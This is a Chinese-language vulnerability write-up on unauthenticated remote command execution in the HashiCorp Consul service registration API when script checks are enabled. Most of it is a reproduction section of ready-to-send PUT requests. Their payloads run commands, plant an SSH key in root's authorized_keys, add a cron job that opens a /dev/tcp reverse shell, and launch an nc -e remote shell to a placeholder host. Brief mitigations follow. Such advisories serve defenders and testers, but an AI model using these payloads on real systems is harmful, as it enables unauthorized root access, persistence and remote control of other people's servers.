Hashicorp Consul Service API远程命令执行漏洞

1.漏洞简介

2018年11月27日，Consul在官方博客中发布了有关Consul工具可能存在远程命令执行（RCE）漏洞的公告，并提供了防护该漏洞的配置方案。Consul是HashiCorp公司推出的一款开源工具，旨在实现分布式系统的服务发现与配置。相较于其他分布式服务注册与发现的解决方案，Consul提供更为全面的功能。它内置了服务注册与发现框架、分布一致性协议实现、健康检查、Key/Value存储、多数据中心方案，无需依赖其他工具（如ZooKeeper等），使用也相对简单。由于Consul采用Go语言编写，因此具有天然的可移植性（支持Linux、Windows和Mac OS X系统）；安装包中仅包含一个可执行文件，易于部署，并且能够与Docker等轻量级容器无缝配合。在特定配置下，恶意攻击者可以通过发送精心构造的HTTP请求，在未经授权的情况下在Consul服务端执行远程命令。

2.漏洞复现

验证Consul服务端存在该远程命令执行漏洞。
访问

http://ip:port/v1/agent/self

命令执行

PUT /v1/agent/service/register HTTP/1.1
Host: xxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)
X-Consul-Token: 
Content-type: application/json
Connection: close
Content-Length: 357

{
    "ID": "bpPeMfZuAN",
    "Name": "bpPeMfZuAN",
    "Address":"127.0.0.1",
    "Port":80,
    "check":{
                "script":"test",
                "Args": ["sh", "-c","whoami"],
                "interval":"10s",
                "Timeout":"86400s"
    }
}

写 ssh 密钥。

PUT /v1/agent/service/register HTTP/1.1
Host: xxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)
X-Consul-Token: 
Content-type: application/json
Connection: close
Content-Length: 357

{
    "ID": "bpPeMfZuAN",
    "Name": "bpPeMfZuAN",
    "Address":"127.0.0.1",
    "Port":80,
    "check":{
                "script":"test",
                "Args": ["sh", "-c","echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDIcxEKnl0blVW6jDkXRkVIlonMiely9CLouVA7YeqgHDDOIxxxx' >> /root/.ssh/authorized_keys"],
                "interval":"10s",
                "Timeout":"86400s"
    }
}

写计划任务。

PUT /v1/agent/service/register HTTP/1.1
Host: xxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)
X-Consul-Token: 
Content-type: application/json
Connection: close
Content-Length: 357

{
    "ID": "bpPeMfZuAN",
    "Name": "bpPeMfZuAN",
    "Address":"127.0.0.1",
    "Port":80,
    "check":{
                "script":"test",
                "Args": ["sh", "-c","echo '* * * * * /bin/bash -i >& /dev/tcp/xxxxx/1234 0>&1' >> /var/spool/cron/root"],
                "interval":"10s",
                "Timeout":"86400s"
    }
}

反弹 shell。

PUT /v1/agent/service/register HTTP/1.1
Host: xxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)
X-Consul-Token: 
Content-type: application/json
Connection: close
Content-Length: 324

{
    "ID": "bpPeMfZuAN",
    "Name": "bpPeMfZuAN",
    "Address":"127.0.0.1",
    "Port":80,
    "check":{
                "script":"nc -e /bin/sh vps_ip port",
                "Args": ["sh", "-c","nc -e /bin/sh vps_ip port"],
                "interval":"10s",
                "Timeout":"86400s"
    }
}

3.影响范围

启用了脚本检查参数（-enable-script-checks）的所有版本。

4.防范措施

• 禁用Consul服务器上的脚本检查功能
• 确保Consul HTTP API服务无法通过外网访问或调用
• 对/v1/agent/service/register 禁止PUT方法

5.参考文章

https://www.imzzj.com/2019/07/04/hashicorp-consul-service-api-yuan-cheng-ming-ling-zhi-xing-lou-dong.html